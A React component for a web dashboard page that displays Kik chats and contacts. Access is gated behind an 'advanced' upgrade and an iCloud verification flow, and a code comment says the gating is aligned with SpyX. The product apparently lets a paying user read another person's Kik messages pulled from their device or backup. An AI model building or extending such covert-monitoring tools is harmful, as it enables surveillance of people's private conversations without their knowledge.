// ** React Imports
import { useCallback, useEffect, useState } from 'react'
import { useExtremeUpgradeRefresh } from 'src/hooks/useExtremeUpgradeRefresh'

// ** MUI Imports
import Box from '@mui/material/Box'
import { useTheme } from '@mui/material/styles'
import useMediaQuery from '@mui/material/useMediaQuery'

// ** Store & Actions Imports
import { useDispatch, useSelector } from 'react-redux'
import { selectMessage, fetchUserProfile, fetchChatsContacts, removeSelectedChat } from 'src/store/apps/kik'

// ** Hooks
import { useSettings } from 'src/@core/hooks/useSettings'

// ** Utils Imports
import { getInitials } from 'src/@core/utils/get-initials'
import { formatDateToMonthShort } from 'src/@core/utils/format'

// ** Chat App Components Imports
import KikSideBar from 'src/@core/components/kik/kik-side-bar'
import KikContent from 'src/@core/components/kik/kik-content'
import KikContacts from 'src/@core/components/kik/kik-contacts'
import { useTranslation } from 'src/utils/i18n'
import { setCurrentTab } from 'src/store/apps/Common'

import ExtremeUpgradeModal from 'src/@core/components/modal/extreme-upgrade'
import { useExtremeFeatureAccessGate } from 'src/hooks/useExtremeFeatureAccessGate'

const Kik = () => {
  let Advanced = window.localStorage.getItem('Advanced')
  Advanced = Advanced == null || Advanced == 0 ? true : false

  // ** States
  const [userStatus, setUserStatus] = useState('online')
  const [leftSidebarOpen, setLeftSidebarOpen] = useState(true)
  const [userProfileLeftOpen, setUserProfileLeftOpen] = useState(false)
  const [userProfileRightOpen, setUserProfileRightOpen] = useState(false)
  const [leftScrollTop, setLeftScrollTop] = useState(0)

  // ** Hooks
  const theme = useTheme()
  const { settings } = useSettings()
  const dispatch = useDispatch()
  const hidden = useMediaQuery(theme.breakpoints.down('lg'))

  const store = useSelector(state => state.Kik)
  const storeCommon = useSelector(state => state.Common)

  // ** Vars
  const { skin } = settings
  const smAbove = useMediaQuery(theme.breakpoints.up('sm'))
  const sidebarWidth = smAbove ? 370 : '100%'
  const mdAbove = useMediaQuery(theme.breakpoints.up('md'))

  const [chat, setChat] = useState(true)
  const [headImg, setHaedImg] = useState('/images/avatars/1.png')

  const [contacts, setContacts] = useState(false)

  useEffect(() => {
    dispatch(fetchUserProfile())
  }, [dispatch])
  const handleLeftSidebarToggle = () => setLeftSidebarOpen(prev => !prev)
  const handleUserProfileLeftSidebarToggle = () => setUserProfileLeftOpen(prev => !prev)
  const handleUserProfileRightSidebarToggle = () => setUserProfileRightOpen(prev => !prev)

  const { t, locale } = useTranslation('common')
  useEffect(() => {
    const title = t('Kik')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, locale])

  const [advanced, setAdvanced] = useState(false) // 是否购买高级服务
  const fetchLoading = [true, 'true'].includes(store.fetchLoading)  // 数据获取中
  const basicNotOver = [null, ''].includes(storeCommon.resetTime.basicUpdateDownloadTime) // 是否未完成一步验证
  const advancedNotOver = [null, ''].includes(storeCommon.resetTime.advancedUpdateDownloadTime) // 高级数据未下载完成（空 = 未完成）
  // 高级功能门控（对齐 SpyX）：未绑高级 → 跳 /ios/extreme-verification；数据未就绪 → 暂停渲染
  const { gatePending, showUpgradeModal } = useExtremeFeatureAccessGate(advanced)
  const [justVerified, setJustVerified] = useState(false) // 是否为刚完成验证

  // 升级成功后：预缓冲已在 notify 完成，这里重拉详情读 advanced
  useExtremeUpgradeRefresh(
    useCallback(() => {
      setAdvanced(true)
      dispatch(fetchUserProfile())
    }, [dispatch])
  )

  useEffect(() => {
    setAdvanced(store.advanced === true || store.advanced === 'true')
  }, [store])

  return (
    <>
      <div
        className='relative bg-[100px] flex justify-center Bxl:h-[calc(var(--vh2)*100-94px)] Bxls:Headers5:h-[calc(var(--vh2)*100-149px)] Header5:big:h-[calc(var(--vh2)*100-214px)] bigs:h-[calc(var(--vh2)*100-274px)] w-full'
        style={{ borderRadius: '10px 10px 10px 10px' }}
      >
        <Box
          className='app-chat flex-1'
          sx={{
            width: '100%',
            display: 'flex',
            borderRadius: 1,
            position: 'relative',
            boxShadow: skin === 'bordered' ? 0 : 6,
            ...(skin === 'bordered' && { border: `1px solid ${theme.palette.divider}` }),
            borderRadius: '10px 10px 10px 10px'
          }}
        >
          {
            !fetchLoading && !gatePending &&
            <>
              {
                (!basicNotOver && !advancedNotOver && !justVerified) ?
                  <>
                    {/* 高级服务开通提示 */}
                    {showUpgradeModal && <ExtremeUpgradeModal open />}
                  </>
                  :
                  <>
                    {/* 增值服务 iCloud验证流程 */}
                  </>
              }

            </>
          }
          <KikSideBar
            store={store}
            hidden={hidden}
            mdAbove={mdAbove}
            dispatch={dispatch}
            userStatus={userStatus}
            selectMessage={selectMessage}
            getInitials={getInitials}
            sidebarWidth={sidebarWidth}
            setUserStatus={setUserStatus}
            leftSidebarOpen={leftSidebarOpen}
            removeSelectedChat={removeSelectedChat}
            userProfileLeftOpen={userProfileLeftOpen}
            formatDateToMonthShort={formatDateToMonthShort}
            handleLeftSidebarToggle={handleLeftSidebarToggle}
            handleUserProfileLeftSidebarToggle={handleUserProfileLeftSidebarToggle}
            chat={chat}
            contacts={contacts}
            headImg={headImg}
            setChat={setChat}
            setHaedImg={setHaedImg}
            setContacts={setContacts}
            setLeftScrollTop={setLeftScrollTop}
            leftScrollTop={leftScrollTop}
            advanced={advanced}
          />
          {chat && (
            <KikContent
              store={store}
              hidden={hidden}
              mdAbove={mdAbove}
              dispatch={dispatch}
              getInitials={getInitials}
              sidebarWidth={sidebarWidth}
              userProfileRightOpen={userProfileRightOpen}
              handleLeftSidebarToggle={handleLeftSidebarToggle}
              headImg={headImg}
              setHaedImg={setHaedImg}
              advanced={advanced}
            />
          )}
        </Box>
        {advanced && !fetchLoading && !gatePending && store.list.length == 0 &&
          <div className='text-center px-2 bg-white rounded-[10px] absolute z-[10] inset-0 flex justify-center items-center pointer-events-none'>
            {t('It appears theres no data to show here yet')}<br />
            {t('If data exists it may take up to 1 hour to download and appear')}<br />
            {t('We suggest checking back in a little while')}
          </div>}
      </div>
    </>
  )
}

Kik.contentHeightFixed = true

export default Kik


